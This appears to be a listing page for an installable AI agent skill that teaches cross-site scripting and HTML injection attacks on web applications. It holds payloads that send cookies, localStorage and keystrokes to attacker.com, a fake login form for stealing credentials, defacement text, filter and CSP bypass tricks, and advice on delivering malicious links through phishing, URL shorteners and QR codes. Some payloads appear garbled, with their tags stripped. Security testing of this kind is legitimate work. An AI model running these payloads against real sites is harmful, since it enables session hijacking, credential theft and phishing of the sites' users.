This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". It provides comprehensive techniques for detecting, exploiting, and understanding XSS and HTML injection attack vectors in web applications.
Add this skill
npx mdskills install sickn33/xss-html-injectionComprehensive XSS testing guide with detailed payloads and bypass techniques
Execute comprehensive client-side injection vulnerability assessments on web applications to identify XSS and HTML injection flaws, demonstrate exploitation techniques for session hijacking and credential theft, and validate input sanitization and output encoding mechanisms. This skill enables systematic detection and exploitation across stored, reflected, and DOM-based attack vectors.
Locate areas where user input is reflected in responses:
# Common injection vectors
- Search boxes and query parameters
- User profile fields (name, bio, comments)
- URL fragments and hash values
- Error messages displaying user input
- Form fields with client-side validation only
- Hidden form fields and parameters
- HTTP headers (User-Agent, Referer)
Insert test strings to observe application behavior:
alert('XSS')
Monitor for:
Stored XSS Indicators:
Reflected XSS Indicators:
DOM-Based XSS Indicators:
Target areas with persistent user content:
- Comment sections and forums
- User profile fields (display name, bio, location)
- Product reviews and ratings
- Private messages and chat systems
- File upload metadata (filename, description)
- Configuration settings and preferences
document.location='http://attacker.com/steal?c='+document.cookie
document.onkeypress=function(e){
new Image().src='http://attacker.com/log?k='+e.key;
}
fetch('http://attacker.com/capture',{
method:'POST',
body:JSON.stringify({cookies:document.cookie,url:location.href})
})
Session Expired - Please Login
Username:
Password:
Build URLs containing XSS payloads:
# Basic reflected payload
https://target.com/search?q=alert(document.domain)
# URL-encoded payload
https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E
# Event handler in parameter
https://target.com/page?name=">
# Fragment-based (for DOM XSS)
https://target.com/page#alert(1)
Techniques for delivering reflected XSS to victims:
1. Phishing emails with crafted links
2. Social media message distribution
3. URL shorteners to obscure payload
4. QR codes encoding malicious URLs
5. Redirect chains through trusted domains
Locate JavaScript functions that process user input:
// Dangerous sinks
document.write()
document.writeln()
element.innerHTML
element.outerHTML
element.insertAdjacentHTML()
eval()
setTimeout()
setInterval()
Function()
location.href
location.assign()
location.replace()
Locate where user-controlled data enters the application:
// User-controllable sources
location.hash
location.search
location.href
document.URL
document.referrer
window.name
postMessage data
localStorage/sessionStorage
// Hash-based injection
https://target.com/page#
// URL parameter injection (processed client-side)
https://target.com/page?default=alert(1)
// PostMessage exploitation
// On attacker page:
frames[0].postMessage('','*');
Modify page appearance without JavaScript:
SITE HACKED
Submit
input[value^="a"]{background:url(http://attacker.com/a)}
input[value^="b"]{background:url(http://attacker.com/b)}
Persistent content manipulation:
Important Security Notice: Your account is compromised!
body{background:red !important;}
Fake login form or misleading content here
alert(1)
alert(1)">
\u0061lert(1)
// String concatenation
eval('al'+'ert(1)')
// Template literals
alert`1`
// Constructor execution
[].constructor.constructor('alert(1)')()
// Base64 encoding
eval(atob('YWxlcnQoMSk='))
// Without parentheses
alert`1`
throw/a]a]/.source+onerror=alert
/**/alert(1)/**/
1. Insert alert(1) → Check execution
2. Insert → Check event handler
3. Insert ">alert(1) → Test attribute escape
4. Insert javascript:alert(1) → Test href/src attributes
5. Check URL hash handling → DOM XSS potential
| Context | Payload |
|---|---|
| HTML body | alert(1) |
| HTML attribute | ">alert(1) |
| JavaScript string | ';alert(1)// |
| JavaScript template | ${alert(1)} |
| URL attribute | javascript:alert(1) |
| CSS context | alert(1) |
| SVG context | `` |
new Image().src='http://attacker.com/c='+btoa(document.cookie);
fetch('https://attacker.com/log',{
method:'POST',
mode:'no-cors',
body:JSON.stringify({
cookies:document.cookie,
localStorage:JSON.stringify(localStorage),
url:location.href
})
});
Scenario: Blog comment feature vulnerable to stored XSS
Detection:
POST /api/comments
Content-Type: application/json
{"body": "alert('XSS')", "postId": 123}
Observation: Comment renders and script executes for all viewers
Exploitation Payload:
var i = new Image();
i.src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);
Result: Every user viewing the comment has their session cookie sent to attacker's server.
Scenario: Search results page reflects query without encoding
Vulnerable URL:
https://shop.example.com/search?q=test
Detection Test:
https://shop.example.com/search?q=alert(document.domain)
Crafted Attack URL:
https://shop.example.com/search?q=%3Cimg%20src=x%20onerror=%22fetch('https://attacker.com/log?c='+document.cookie)%22%3E
Delivery: URL sent via phishing email to target user.
Scenario: JavaScript reads URL hash and inserts into DOM
Vulnerable Code:
document.getElementById('welcome').innerHTML = 'Hello, ' + location.hash.slice(1);
Attack URL:
https://app.example.com/dashboard#
Result: Script executes entirely client-side; payload never touches server.
Scenario: Site has CSP but allows trusted CDN
CSP Header:
Content-Security-Policy: script-src 'self' https://cdn.trusted.com
Bypass: Find JSONP endpoint on trusted domain:
Result: CSP bypassed using allowed script source.
| Issue | Solutions |
|---|---|
| Script not executing | Check CSP blocking; verify encoding; try event handlers (img, svg onerror); confirm JS enabled |
| Payload appears but doesn't execute | Break out of attribute context with " or '; check if inside comment; test different contexts |
| Cookies not accessible | Check HttpOnly flag; try localStorage/sessionStorage; use no-cors mode |
| CSP blocking payloads | Find JSONP on whitelisted domains; check for unsafe-inline; test base-uri bypass |
| WAF blocking requests | Use encoding variations; fragment payload; null bytes; case variations |
Install via CLI
npx mdskills install sickn33/xss-html-injectionCross-Site Scripting and HTML Injection Testing is a free, open-source AI agent skill. This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". It provides comprehensive techniques for detecting, exploiting, and understanding XSS and HTML injection attack vectors in web applications.
Install Cross-Site Scripting and HTML Injection Testing with a single command:
npx mdskills install sickn33/xss-html-injectionThis downloads the skill files into your project and your AI agent picks them up automatically.
Cross-Site Scripting and HTML Injection Testing works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.